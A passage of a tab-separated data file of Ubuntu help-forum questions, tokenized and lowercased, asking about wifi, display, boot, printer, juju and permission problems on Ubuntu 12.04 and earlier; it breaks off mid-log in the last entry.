150992	how to see currently connected clients of vsftp	i 'm using vsftpd . now i would like to now if - and if , who - someone is currently connected to the server . is it possible to find out , if anybody is connected , how many and even who is connected ?
150994	calling a python script from a button using glade designer	how can i call the ubuntu one authentication python script from a button using glade ? what i need to do is call a python script such as : $ python u1file.py login adding ubuntu one files support to your app
150996	login window not showing	while this is very similar to other problems reported ( and even abandoned and closed ) , i have n't seen so far any suggestion that solves the issue . on the other hand , there seem to be some details differing from other cases reported . my ubuntu 10.04 boots and runs up to showing the background , drumbeat sound , and mouse pointer but not login window . i can change to tty1 ( or any or the other five ) , and have tried stopping , reconfiguring and restarting gdm ; tried reconfiguring plymouth ; asked for apt-get to fix any broken packages ( none ) , even reconfigured and updated grub ( not really necessary ) . what i managed to do is to run startx after sudo service gdm stop compiz working fine there , i know all my files are ok . but no gnome or anything except my desktop background image and a terminal if i do [ ctrl ] + [ alt ] + [ t ] ( this one might dissapear after a while , though ) . i suspect some ( gdm ) configuration file has been corrupted , but i have no idea which it might be or how to restore it . i have some log files in case somebody could look at them and help . thank you in advance . .xsession-errors /var/log/gdm/:1-slave.log.1 /var/log/gdm/:1.log.1 /var/log/gdm/:1-greeter.log.1
151002	using gnome-shell themes for unity possible ?	i 'd like to install some themes made for gnome-shell , like to know if they will work on unity as well ?
151007	computer completely shuts down	i 've been having a problem with my ubuntu 12.04 64-bit machine which is happening quite often and randomly . during a normal session and without any indication that something is wrong the computer just shuts down completely as if i unplugged it from the wall.. i read somewhere that this is probably caused due to overheating so i installed the `` sensors '' program to monitor the cpu temperature which running it after the crash indicates that all core temperatures are at normal levels . does anyone have an idea as to what might be causing the problem and most importantly if there are any log files i could examine to troubleshoot this .
151009	hardware install , care to explain ?	i have tried to active post release ati amd , but it seem do n't work , anyone you know how to do this ? please thanks http : //imageshack.us/photo/my-images/854/screenshotfrom201206141.png/
151014	administrator account with no password is unusable	i tried removing my administrator account 's password . now that there is no password set for it , i can not put a new one nor do any actions which needs administrator privileges . i tried different fixes found on askubuntu , including resetting of password using recovery mode . however my problem is that when i 'm on the part where the console asks for password , i can not type anything , thus i can only send a blank respond . then it 's unchanged . i also experience this kind of problem that i 'm unable to enter password on consoles like when i tried on the free debian server i got ( just putting it up an example just in case you can help me to this problem ) . thank you very much ! and i 'll appreciate immediate help . more power to ubuntu .
151015	how to put a ( start ) menu button on fluxbox toolbar	i often run programs maximized ( leaving no desktop area ) . i want to be able to use my mouse alone to open the menu , and my mouse has no scroll wheel . i 'm just going for a simple old school windows look . how can i put a menu button on the fluxbox toolbar ?
151017	how do i create a deb for gcc 4.7 ?	i 'm sorry but i have tried the tutorials on various websites . nothing , so far , has worked . i 'm using ubuntu maverick 10.10 . i 've downloaded , compiled and installed gcc 4.7.0 . now i want to make a .deb file of the gcc 4.7.0 . could anybody give me the sure steps to creating a gcc 4.7.0 .deb file ? thank you !
151018	12.04 screen resolution keeps changing after reboot	running ubuntu 12.04 64-bit desktop on intel pentium 2 pc with 2gb of ram , ati hd3870 radeon , sony wega 50inch lcd tv . i had no problems with any previous versions ! first , when i go to displays it shows as a laptop screen ( not sony , like it did previously ) . my main problem though is , i have to set the resolution to 1152 x 648 ( 16:9 ) to be able to see everything on the screen . every time i reboot the pc when the desktop comes back up it resets the resolution to 1920 x 1080 ( 16:9 ) and i have to go in to the displays and reset it to the 1152 x 648. and the next reboot , start it all over again , just a pain in the you know what !
151022	how can i create a new socket in /dev ?	i want to create a new socket file in /dev . does the way to get it is adding a new rule to udev ?
151024	gui changes brightness in wrong /sys/class/backlight/*/brightness	when i use fn+f6 / f7 ( brighness down and up on toshiba ) the brightness notification opens up and responds , but the actual screen brightness remains unchanged . when i go to settings > brightness and adjust the slider , the same happens . lspci reports my single graphics card : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati mobility radeon hd 2400 i noticed both actions are taking effect on /sys/class/backlight/toshiba/brightness . when i manually change /sys/class/backlight/acpi_video0/brightness though , the screen finally lightens/darkens accordingly . toshset reports `` required kernel toshiba support not enabled . '' installing toshiba-acpi-fix from ppa : keks9n/main does n't work - install fails with : '' reloading the module error : module toshiba_acpi does not exist in /proc/modules fatal : error inserting toshiba_acpi ( /lib/modules/3.2.0-25-generic/kernel/drivers/platform/x86/toshiba_acpi.ko ) : no such device '' ( by the way , i only tried toshset because i saw it suggest elsewhere it could help diagnose the problem . i have no intent or reason to install toshiba-acpi-fix unless it fixes the brightness issue . ) how do i make the system write to the right brightness control file ? is there any way to get rid of the invalid directory entry ? ( by the way 2 folders in sys/class/backlight ? did n't help me . )
151025	how can i make fsck run non-interactively at boot time ?	i have a headless ubuntu 12.04 server in a datacenter 1500 miles away . twice now on reboot the system decided it had to fsck . unfortunately ubuntu ran fsck in interactive mode , so i had to ask someone at my datacenter to go over , plug in a console , and press the y key . how do i set it up so that fsck runs in non-interactive mode at boot time with the -y or -p ( aka -a ) flag ? if i understand ubuntu 's boot process correctly , init invokes mountall which in turn invokes fsck . however i do n't see any way to configure how fsck is invoked . is this possible ? ( to head off one suggestion ; i 'm aware i can use tune2fs -i 0 -c 0 to prevent periodic fscks . that may help a little but i need the system to try to come back up even if it had a real reason to fsck , say after a power failure . ) in response to followup questions , here 's the pertinent details of my /etc/fstab . i do n't believe i 've edited this at all from what ubuntu put there . uuid=3515461e-d425-4525-a07d-da986d2d7e04 / ext4 errors=remount-ro 0 1 uuid=90908358-b147-42e2-8235-38c8119f15a6 /boot ext4 defaults 0 2 uuid=01f67147-9117-4229-9b98-e97fa526bfc0 none swap sw 0 0
151030	problem with external sata hdd	my pc ca n't read external sata hdd which i took off the old lap-top . i bought case for sata hdd which work on usb 2.0 . at my other pc and friends pc it worked ok , because he have and windows and ubuntu , and i tried to format it for ext4 , and now i cant see on any other pc , except friends . how can i repair it or do something with him ?
151035	is it necessary to add an hp printer to cups using the hplip uri ?	i recently setup a cups print server ( ubuntu server 12.04 ) and i having trouble with performance of a hp color laserjet printer cp3505n . the printer pauses for about a second between printing each page , which is annoying when there is a lot of printing to be done . this does n't happen when the printer is installed directly to a windows client . in an attempt to fix this i have setup the printer a couple different ways . i decided not to do a samba share since this wiki said ipp is preferred . first method added to hp laserjet to cups as a discovered network printer , and selected hp color laserjet cp3505 hpijs pcl3 , 3.12.2 ( en ) driver . i did not use a hplip uri . second method ( hplip uri ) i thought adding hplip to the mix might improve the performance , so i added the printer like this : ran hp-setup -m 192.168.2.60 , prompted to select driver selected hp color laserjet cp3505 hpijs pcl3 , 3.12.2 ( en ) used hplip to generate a uri : hp-makeuri 192.168.2.60 then added the printer to cups as a local printer : hp printer ( hplip ) , and entered : hp : /net/hp_color_laserjet_cp3505 ? ip=192.168.2.60 . either method i use i am able to share the printer on the network by adding a printer as http : //192.168.2.2:631/printers/hp_laser-terrac . does it make a difference which way the printer is added cups ? if so , and i install the printer with the hp uri , can i still change the driver using the cups web interface ? i have been trying out different drivers to try and improve performance , and the cups interface is the easiest way to change them . thanks in advance .
151039	wireless network not connecting to wifi	all of a sudden my machine 's wireless network is not connecting to my wifi router.how can i figure out if its an issue with the wlan card or if its withing the ubuntu system settings ? is there a command to check if the wireless is working ? $ nm-tool networkmanager tool state : disconnected device : eth0 type : wired driver : e1000e state : unavailable default : no hw address : 00:1c : c0:34 : d4:1f capabilities : carrier detect : yes wired properties carrier : off sudo lshw -c network *-network description : ethernet interface ... . ... .
151041	12.04 , slow load , vmware player	everything , including booting , apt-get install , and web browser page load is snappy , but anything that requires random disk io seems to be slow . the examples include : application launch , sudo command , etc . any reason why this would happen ? i am using vmware play 4.0.4 , 128gb sdd , 20gb allotted to the virtual disk . so far i tried both hardware acceleration enabled/disabled . i also ran iozone test for disk io speed , which seems to be reasonably fast . i do no think i need to align my disk space as it should be managed by my primary os , windows 7 . could it be that this is vmware issue ?
151048	launchbar glitch with auto-hide after installing skype 4.0	in the options menu i set the launch bar to auto-hide , but it still does n't hide . i 've tried turning off that mode and turning it back on , but it did n't help . i restarted my computer 3 times , but it still glitches . i have ubuntu 12.4lts . is anyone else experiencing the same problem ?
151049	how to deal with a frozen screen ?	my os is ubuntu 12.04 . sometimes the screen suddenly becomes frozen , except that the mouse can move around . i have no choice but to hit the power button of my laptop . in windows , whenever screen becomes frozen , i just hit ctrl+alt+delete to invoke task manager , which is still responsive , and kill the processes that consumes most resources and are likely the culprit of the freezing . but in ubuntu , i do n't know what some good way to deal with such a situation . thanks !
151052	problem installing ubuntu 12.04 after downloading	i have downloaded ubuntu 12.04 and the flle is in my hard drive as ubuntu-12.04-desktop-i386.iso.dap but while installing ubuntu it opens with km player and get hanged.i have checked the proper ties of the file and got - type of file : dap file and open with km player.please help me out ... ..
151056	how to downgrade compiz to 0.8.6 in ubuntu 12.04 ?	is there a safe way to downgrade compiz to 0.8.6 in ubuntu 12.04 ? i do n't want to use unity anymore and due to bug # 862430 and bug # 933776 compiz is unusable for me . i would appreciate any suggestion .
151067	wallpaper change	i am using ubuntu 12.04 32 bit . my problem is when i select a desktop background , the desktop does n't update with the new wallpaper . i am unaware of what might be the error . for more clarification look at the image . edit : what ever the wallpaper i have selected now , thats applying as wallpaper after a restart and one more thing is i can add wallpapers but what ever i have selected they are not applying as wallpaper .
151068	for a 32-bit kernel , what are the pros/cons of pae vs. non-pae ?	i am using ubuntu 12.04 32-bit . my kernels are pae kernels . i know these are the kernels we can use for 32-bit os which have 4 gb ram , to utilize all 4gb of ram . my system is a 32-bit system . so i thought i do n't need them . what are the advantages and disadvantages i am going have if i keep running pae kernels ? raja @ badfox : ~ $ uname -a linux badfox 3.2.0-24-generic-pae # 39-ubuntu smp mon may 21 18:54:21 utc 2012 i686 i686 i386 gnu/linux
151069	problems about responsiveness and keyboard/mousepad not working	so i installed ubuntu 12.04 , i 'm very new at this and want to get into the world of linux but have run into nothing but problems . i have an acer aspire 5553g . first off , my keyboard wo n't work . second , my computer has more than enough of everything to run ubuntu smoothly , but everything runs extremely slow . ( you move the mouse and it gets there a few seconds later ) it 's to the point where i can't even use it and i really want to . i 'm tired of microsoft stuff and i 've been looking at learning how to use linux based operating systems for a while . please send me some help to fix these issues and maybe some tips to help get me started . thanks in advance chris
151073	how to create windows xp liveusb using ubuntu to replace it	i am using an acer aspire one netbook with no cd-disk drive , and would like to uninstall ubuntu 12.04 lts and install windows xp in its place . the problem here is that i ca n't seem to find a program that can put the windows boot files on a usb drive from an iso file . i have ubuntu fully installed and have tried using unetbootin . when i tried booting from unetbootin i got a screen with a blue box that had the word `` default '' in it highlighted . underneath the box there was a countdown that said `` will boot from default in 10 '' after the countdown finished the number would revert to ten and nothing would happen . can someone tell me another program that would be useful for this please ?
151075	what is the correct way to set config options to a juju service unit with a file ?	i need to set some secondary config options to a service charm deployed with juju . all of the options needed are preset to empty in the original config.yaml file . now , some of those settings are changed in a separate config file named extra-config.yaml . how does one set these file config options to the service charm with the config-changed hook triggering ? also , can the extra-config.yaml be placed outside the charms directory structure ? this command works , but the config-changed hook is not triggered -- > juju set -- config precise/cool-charm/extra-config.yaml cool-charm note : the docs provide a -- file option which is not recognized .
151077	how can i disable asus-nb-wmi when using battery power mode ?	i 'm trying to improve the battery life of my asus u32u notebook . i 'm running ubuntu 12.04 64bit and using powertop it shows the following : powertop 1.97 overview idle stats frequency stats device stats tunables summary : 311.6 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec power est . usage events/s category description 6.29 w 100.0 % device radio device : asus-nb-wmi 1.19 w 100.0 % device display backlight 0 mw 49.3 ms/s 42.8 process compiz 0 mw 19.5 ms/s 51.4 process /usr/bin/x :0 -auth /var/run/li 0 mw 10.3 ms/s 16.8 process gnome-terminal 0 mw 5.5 ms/s 118.1 interrupt ps/2 touchpad / keyboard / mous 0 mw 2.0 ms/s 37.0 interrupt [ 45 ] fglrx [ 0 ] @ pci:0:1:0 0 mw 1.6 ms/s 0.4 process powertop 0 mw 1.5 ms/s 1.1 process /usr/lib/unity/unity-panel-serv 0 mw 1.0 ms/s 4.5 timer tick_sched_timer 0 mw 1.0 ms/s 9.3 process syndaemon -i 2.0 -k -r -t 0 mw 0.9 ms/s 20.3 timer hrtimer_wakeup 0 mw 0.8 ms/s 0.2 process [ flush-ecryptfs- ] 0 mw 0.7 ms/s 0.9 process /usr/lib/gnome-settings-daemon/ 0 mw 697.3 âľs/s 0.2 kwork rfkill_poll according to this ubuntu community help page the asus-nb-wmi driver is responsible for implementing the function keys , something i can definitely live without if it means i will get longer battery sessions . so i would like to know if its possible to disable the asus-nb-wmi when not plugged in to ac power , and if so , how .
151078	unable to open /usr/include/python2.7/pyconfig.h ( permission denied )	i am getting the following weird permission denied problem in python and this is happening whenever i login ( ssh ) as a normal user ( means not root ) : traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 562 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 544 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 271 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 246 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 236 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 543 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 442 , in get_config_vars _init_posix ( _config_vars ) file `` /usr/lib/python2.7/sysconfig.py '' , line 321 , in _init_posix raise ioerror ( msg ) ioerror : invalid python installation : unable to open /usr/include/python2.7/pyconfig.h ( permission denied ) the permission to /usr/include/python2.7/pyconfig.h reads like : -rw-r -- r -- 1 root root 35884 2011-10-04 17:24 /usr/include/python2.7/pyconfig.h not sure what is causing this problem , btw , i know there are similar question to this problem ( link1 and link2 ) but those are with respect to `` no file or directory '' .
151079	resolve big ugly plymouth splash xubuntu 12.04	i have tried with plymouth manager & also here no joy . hardware is lenovo thinkpad edge ( e ) 325 with amd radeon discreet graphics . laptop is ubuntu certified & everything else works out of the box . please assist . edit : splash was fine until an update broke correct resolution .
151083	how do i close entries in my alt-tab menu ?	that 's right , i want to close a bunch of stuff using my alt-tab window , quickly . let 's say i have a bunch of windows open in an image editing program , for example : i 'd like to have a hotkey ( e.g. , ctrl+w ) i can press while the alt-tab menu is up that will close the currently selected window . is a hotkey for this ?
151088	ca n't get juju to deploy , problem with ec2 keypair ?	i wanted to give a shot at deploying a wordpress blog with juju . although am very new to juju and the amazon ec2 , and am having some troubles . i am able to bootstrap an environment like this : juju bootstrap -- constraints `` instance-type=t1.micro although i have not been successful at deploying anything . here is the output of juju -v status : 2012-06-14 21:17:13,377 debug initializing juju status runtime 2012-06-14 21:17:13,387 info connecting to environment ... 2012-06-14 21:17:14,241 debug connecting to environment using ec2-50-112-192-46.us- west-2.compute.amazonaws.com ... 2012-06-14 21:17:14,241 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' ec2-50-112-192-46.us-west-2.compute.amazonaws.com '' remote_port= '' 2181 '' local_port= '' 52585 '' . 2012-06-14 21:18:33,207 debug retrying connection : can not connect to environment using ec2-50-112-192-46.us-west-2.compute.amazonaws.com ( perhaps still initializing ) : could not connect before timeout after 1 retries 2012-06-14 21:18:34,039 debug connecting to environment using ec2-50-112-192-46.us-west-2.compute.amazonaws.com ... 2012-06-14 21:18:34,039 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' ec2-50-112-192-46.us-west-2.compute.amazonaws.com '' remote_port= '' 2181 '' local_port= '' 41481 '' . it keeps retrying although it never establishes a connection . i thought maybe it just needed some time so i tried it almost an hour later , same thing . i looked online at the aws management console under instances and i can see that the instance is running , although it does n't seem to have any associated keypairs ( when i click `` connect '' aws tells me this ) . i am able to start instances and ssh to them using the ec2-tools by following ec2 starters guide , and running ec2-run-instances ami-20800c10 -k $ { ec2_keypair } -t t1.micro . the instances i start this way have my key-pair listed under the description tab on the aws instances page , and i have the option of connecting to them . so why are the instances i am starting with juju not getting my key-pair associated with them ? i set up ~/.juju/environments.yaml as described here . hopefully i am not overlooking something too simple , thanks in advance for any help .
151096	adding an existing user to another group	i am having this strange problem . i am using usermod to add an existing user to another group . i want to create a new user and add an old user to this new user 's group . to do this , i am doing the following things create a new user , -m creates the home directory for the user and -u creates a group by the same name , as that of the user . useradd -u -m newuser then i add the old user to the new user 's group as usermod -a -g newuser olduser -a appends this group to the already existing groups and -g is used to give the group name . now when i do groups olduser i get the following out put olduser newuser , but being the olduser i am unable to create a any file in the newuser home directory . i have set the proper directory permissions , the read , write and execute bit is set for group . however if , instead of using usermod i manually edit the /etc/group file , and add newuser , olduser in front of the newuser group then everything works correctly . is there a bug in usermod or i am doing something wrong .
151098	wi-fi does n't work ( hard blocked )	yesterday i installed ubuntu 12.04 for the first time ( i 've always been a windows user ) as i was at the office and i had the ethernet connected . at home i only use wi-fi . when i started ubuntu it did n't connect or try to connect with any network . by google , i found the command rfkill and these are the results : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 2 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 3 : dell-bluetooth : bluetooth soft blocked : no hard blocked : no well , the wi-fi is blocked by hardware , so i tried the command rfkill unblock 2 and it did n't work . as i did n't know even my broadcom model , i found lspci and the result for the wi-fi is : 0e:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) my laptop is a dell vostro 1520 with winxp also installed . thanks for the help ! ps : it also may help that when i enter system settings > network ( it may be different , my ubuntu is in spanish ) `` airplane mode '' is connected . when i try to unlock it , it goes to its original place after i close that window and open it again and when i reboot . update added from comment to an answer the broadcom `` additional drivers '' are turned on and enabled .
151099	how to uninstall vmware player on ubuntu 12.04 ?	i want to uninstall vmware player on my ubuntu 12.04 lts system . how should i uninstall it ?
151101	why are .goutputstream-xxxxx files created in home folder ?	i find a lot of files with names of the like .goutputstream-xxxxx where xxxxx are some alphanumeric characters . here is a screenshot of the home folder any idea why i should keep these or can i remove and also stop further creation ?
151106	ca n't to run games .iso on pcsx ( ubuntu 12.04 )	i try to run ps1 games on pscx using by .iso file and i already set scph1001.bin . but stuck on this error : cd rom failed the cd does not appear to be a valid playstation cd
151107	every time i boot my laptop i get asked to remove any media and restart , like you do after ubuntu installation anyone know why this happpening ?	i have ubuntu fully installed on my laptop with no installation media in or attached . everytime is boot my laptop it asks me to remove installation media and press enter to restart , like what happens after installation . i have never had this issue before with this laptop or any of my systems . pleas help thankyou in advance .
151108	wifi regulatory domain for bohemia ?	usa has reg domain 0x0 , but what is reg . domain code for bohemia ? ( bo )
151112	how do i get the skype status icon back ? ( on panel/tray )	i installed skype 4.0 following this guide . however my little skype icon in the unity status bar ( in the top right corner with clock , volume , etc . ) is gone . how do i get it back ?
151115	remove icon borders in unity application switcher	in unity 's application switcher ( alt-tab ) , each icon has a colored border ( see red arrow in screenshot below ) . it is misleading , a bright icon has a bright border , making it look as if it were the currently selected icon . is there a way to disable this border ? note : i already applied the tip from this different question .
151119	wifi on ubuntu 10.04 stopped working	yesterday my wifi just stopped working on my ubuntu 10.04 lts system . i am on an ibm x60 thinkpad .
151123	my wireless network does not connect	i have just started using ubuntu , and have always been using windows , so i am a bit of a newbee here . i installed the 12.04 precise pangoline version the other day , and everything seem to work fine , except for the fact that the wireless network does n't seem to work . when i go to system settings -- > network -- > wireless i ca n't move the bottom to `` on '' . and when i turn airplane mode off , it automatically sets it back to on when i leave the menu . i have windows 7 running on another partition and here i can access the wireless network without any problems . i am using a dell vostro 3450 .
151125	why does xchat always open only partially maximized ?	when i start xchat , i note the issue : as you can see , the bottom edge of the window is covered by some other thing ( in this case , it 's firefox status bar , but if i have no other window opened , i see my desktop background in that position ) , so i reduce it with the maximize button on top left : finally i maximize it again and obtain the wanted behaviour : is this a bug or can i adjust it in any way ?
151127	how do i move ( copy ) my entire ubuntu system to a different hard disk ?	the hdd i have my ubuntu installed is about to fail . i would rather not lose 3 years worth of data , customisation and apps . i am looking for a way to move the complete system ( swap included , because i 'm not sure if i can relink the system to a new swap partition ) to another hdd . but not the complete hdd < only the partition containing ubuntu , to a partition on a different hdd . basically i 'd like to do what i 've been able to do with norton ghost for my windows install . i thought about using clonezilla but i think i would have issues with grub ( especially trying to boot from a different uuid than what is in the conf file ) . do you know of any way this could be done ? ps , my home directory is encrypted but that 's not really an issue , because i can work around that . edit : changed the explanation to make it clearer
151128	is quickly a python-only development tool ?	i 'm looking at the ubuntu app development tool quickly . from what i can see only python is available with this tool . is this correct or are other languages like java ( and others ) also available ?
151129	after upgrade to 12.04 , suspend locks my laptop	after upgrading to 12.04 suspend no longer works . going into suspend seems to work , screen , fan , disk and led 's shuts down . when trying to resume i can hear the fan staring up for a second or two before switching off again , the led 's light up again but the screen does n't . i tried to login ( with screen off ) , but it makes no difference , the only thing i can do is unplug it and remove the battery to reboot it . i had this problem before when installing amd proprietary graphics driver , but not when using radeon driver . what can i do to troubleshoot this ? lenovo ideapad s205 , amd e-450 , ubuntu desktop 12.04 amd64 . open source radeon graphics driver . compiled ralink proprietary linux rt3090 wifi driver .
151136	how do i permanently reduce grub waiting time ?	i edited /boot/grub/grub.cfg to reduce the grub waiting time , but after recent update resets grub.cfg file to its initial state . i know there is a way to make it permanent , but i do n't know how . please anyone advice . ( i tried to edit /ect/default/grub , but such a file does not exists in my system , 12.04 lts )
151143	samsung intel graphis hd 3000 + nvidia geforce gt 520mx	i just buy a samsung np300e5a-s05it with a intel graphis hd 3000 + nvidia geforce gt 520mx for 3d effect ... the propblem is that my ubuntu 12.04 not support intel graphics and also nvidia 3d support some people have same problem ? exist a solution for this problem ? thanks in advance and sorry from my poor english walter
151145	windows 7 suspend failed after ubuntu 12.04 installation	hp 6235.fr - 2 hard disk - 1 nvdia gt220 clean installation of windows 7 on first hard disk . windows 7 suspend/wake up is working . clean installation of ubuntu 12.04 from web iso image on second hard disk . windows 7 suspend/wake up is working . software update of ubuntu 12.04 ( in particular , grub is also updated ) . windows 7 suspend is not working anymore ( login screen is coming back ... ) . is there any solution to this problem ? n.b : if windows 7 is booted via nt loader and not with grub , suspend/wake up is working .
151148	how do i participate in the ubuntu app showdown ?	how can i sign up for this event ? i was reading this page : http : //developer.ubuntu.com/showdown/ . my understanding is that i just need to mention my project to @ ubuntuappdev on twitter , and submit the app before the 9th july 2012 . is this right ? is that all ? thanks in advance !
151153	no application icon in unity bar with skype 4.0	after installing skype 4.0 on ubuntu precise , i see its indicator in top bar , but there is no running application icon on the left , thus i ca n't focus into it and pin to the launcher . i had 2.2 version before , but purged it as described in skype 4.0 still looks like 2.2 beta , so i believe this can be considered clean install . related question is whether it 's possible to have overlay with new/unread messages in the unity launcher icon similar to indicator ?
151157	how do i install hd3000 drivers on ubuntu 12.04 ?	i have a dell xps 15 l502x . in ubuntu 12.04 it is not using the intel graphics and therefore , it is eating a lot of battery . any suggestions on how to get my intel graphics to work instead of nvidia gt 540m would be appreciated . system specs core i7-2860 ram- 8gb intel hd 3000 nvidia gt540m p.s . i am totally new to linux so detailed instructions would be really appreciated . thanks .
151166	will my laptop work with ubuntu 12.04 lts ?	i have a really old dell inspiron 8200 laptop with intel pentium 4 . i was wondering whether it would work . it has a p4 processor , 511mb memory and i have tried the 32-bit version of 12.04 . i dont know whether it does n't support a live cd/dvd ( i used a dvd ) or if it 's because of my using the toshiba disc creator 's `` image to disc '' function .
151177	keyboard layout wont change	i am using dvorak layout and i want to switch to qwerty but apparently this is not possible via gui settings and it stuck on dvorak is there any way to completely reset keyboard layout ? i am using ubuntu 12 04 and i have this problem in both kde and gnome thanks edit : the indicator on the top bar in gnome is also messed up . i have another layout ( persian ( fa ) ) , but , when i switch between layouts with keyboard shortcuts , it is english ( dvorak ) when the indicator is fa ( and is not en ) , and vice versa .
151183	how can i restart unity/gdm when i get a blank screen after suspend ?	occasionally , with ubuntu 12.04 , i get a blank screen when i resume from suspend . i can see the mouse cursor , but that 's all . i can get tty terminals , so is there a way to restart the graphical front-end from the command line ? i know this was possible back with gnome , but am not sure with unity .
151184	how to remove xpad window decoration in ubuntu 12.04	i installed xpad to use as sticky notes in ubuntu 12.04 . however , xpad opens up like a normal app with window decorations as does not look like a sticky note at all . is there a way to customise that ? the toolbars do not show up for xpad in ubuntu 12.04 . also , are there any other sticky note apps which behave like the windows 7 sticky note or kde sticky note which work in ubuntu 12.04 ?
151185	ibus works in gedit but not in libreoffice	i installed ubuntu 12.04 on a toshiba satellite . i also installed libreoffice 3.5.3.2 ( along with tamil language related packages ) . i downloaded the required m17n packages . i am able to choose the ibus framework , choose the tamil99 `` input method '' , and type in tamil when i run gedit and also in the terminal window . but , i am unable to do so in libreoffice ( right clicking does n't show any input method menu item ) and thunderbird . thanks for any pointers you may be able to provide .
151194	ca n't hold left button on touchpad and drag in 12.04 and no right click	after updating to 12.04 , i can not use the mouse buttons . i have a work around to be able to drag with the touchpad alone , also to use the touchpad for right click . i would however like to use the actual buttons to drag and drop and actually right click . i have an acer aspire s3 series laptop . does anyone know why this may be happening and how i can fix it ?
151196	can i use old code by myself to build on for my entry in the ubuntu app showdown contest ?	or does it have to be started completely from scratch at 18th of june ?
151200	my main username is not in the sudoers file	i was trying to install some software/edit files with my main username ( not root ) but i got this error [ x ] is not in the sudoers file . this incident will be reported . i tried to edit the /etc/sudoers file by using sudo and su username but i got the same error ! how i 'm supposed to add my username tosudoers file while i cant access it anyway ? i also tried to follow this guide here . is the guide says , when booting 2 operating systems ( that 's my case ) , then selecting ubuntu , a menu will let you choose to start normally/open recovery mode/etc , but it 's not happening for me , even if i hold shift no menu will pop up . i installed ubuntu by using wubi and my ubuntu version:12.04 lts .
151201	after upgrading to 12.04 the scanner from brother printer mfc-290c does not work	i upgraded ubuntu to 12.04 from 11.10 . the printer works , but the scanner does n't now . in 11.10 i had to install a special driver from brother . the printer 's model is brother mfc-290c . the computer is a toshiba satellite . how can i get the scanner working ? update : i have a 64-bit installation on the toshiba satellite . thank you for your instructions , chad -- 24216 . i followed each step : 1 through 5 . i also updated the brother linux scanner s-key tool . the output of dpkg -l | grep brother is : ii brscan-skey 0.2.3-0 brother linux scanner s-key tool ii brscan3 0.2.11-5 brother scanner driver ii mfc290ccupswrapper : i386 1.1.2-2 brother cups inkjet printer definitions ii mfc290clpr : i386 1.1.2-2 brother lpr inkjet printer definitions ii printer-driver-ptouch 1.3-3ubuntu0.1 printer driver brother p-touch label printers still the scanner does not work . here is the message from xsane : failed to open device brother3 : bus6 ; dev1 : invalid argument . here is the message from simple scan : failed to scan . unable to connect to scanner . and scan utility still does n't display the scanner line .
151202	xchat irc , two nicks	hi i do n't think this is a possible one but i am trying to get some help . i have two different nicknames belongs two two different accounts in freenode . so may i use xchat irc to access freenode with those two nicks ?
151205	what is gdomap and what is it used for ?	since upgrade 12.04 lts i noted this process because it 's giving errors on startup and shutdown : unable to stat gdomap what is gdomap ? what is it used for ? can be safely removed ? how ?
151209	wireless problems on hp	i 'm not able to enable wireless using the hardware switch on my hp probook4430s . because of this the enable wireless option is greyd out and i can not enable it . the greyd out option can be seen in the screenshot below . the results of iwconfig for my system are as follows , lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . also i tried to do the following , sudo ifconfig wlan0 up but i got an error as below , siocsifflags : operation not possible due to rf-kill also the result of sudo rfkill list all for my system is as follows , 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no how do i fix this problem ? thanku !
151213	sd card bigger than 2gb is not recognized in ubuntu 12.04	when i insert a card up to 2gb it is immediately seen by the system but if try it with bigger one it 's not seen . i presume the issue is not due to the card reader itself as it reads all cards under windows 7 but due to linux driver . i could see some people having similar issues but no solution . any help appreciated . gparted doesnt see cards bigger than 2gb . after insertion small card ubuntu @ ubuntu : ~ $ dmesg [ 10169.384481 ] mmc0 : new sd card at address a95c [ 10169.384870 ] mmcblk0 : mmc0 : a95c sd016 14.0 mib [ 10169.386715 ] mmcblk0 : p1 everything worked fine then i removed the small one and put 8gb , waited for 2min [ 10295.736422 ] mmc0 : card a95c removed [ 10362.448383 ] sdhci : switching to 1.8v signalling voltage failed , retrying with s18r set to 0 [ 10372.480076 ] mmc0 : timeout waiting for hardware interrupt . [ 10382.496146 ] mmc0 : timeout waiting for hardware interrupt . [ 10392.512149 ] mmc0 : timeout waiting for hardware interrupt . [ 10402.528145 ] mmc0 : timeout waiting for hardware interrupt . [ 10402.529267 ] mmc0 : error -110 whilst initialising sd card [ 10402.748807 ] sdhci : switching to 1.8v signalling voltage failed , retrying with s18r set to 0 [ 10412.768063 ] mmc0 : timeout waiting for hardware interrupt . [ 10422.784051 ] mmc0 : timeout waiting for hardware interrupt . [ 10432.800076 ] mmc0 : timeout waiting for hardware interrupt . [ 10442.816067 ] mmc0 : timeout waiting for hardware interrupt . [ 10442.817165 ] mmc0 : error -110 whilst initialising sd card [ 10443.040805 ] sdhci : switching to 1.8v signalling voltage failed , retrying with s18r set to 0 [ 10453.056145 ] mmc0 : timeout waiting for hardware interrupt . [ 10463.072139 ] mmc0 : timeout waiting for hardware interrupt . [ 10473.088050 ] mmc0 : timeout waiting for hardware interrupt . [ 10483.104046 ] mmc0 : timeout waiting for hardware interrupt . [ 10483.104107 ] mmc0 : error -110 whilst initialising sd card [ 10483.328960 ] sdhci : switching to 1.8v signalling voltage failed , retrying with s18r set to 0 [ 10493.344144 ] mmc0 : timeout waiting for hardware interrupt . ubuntu @ ubuntu : ~ $ lspci 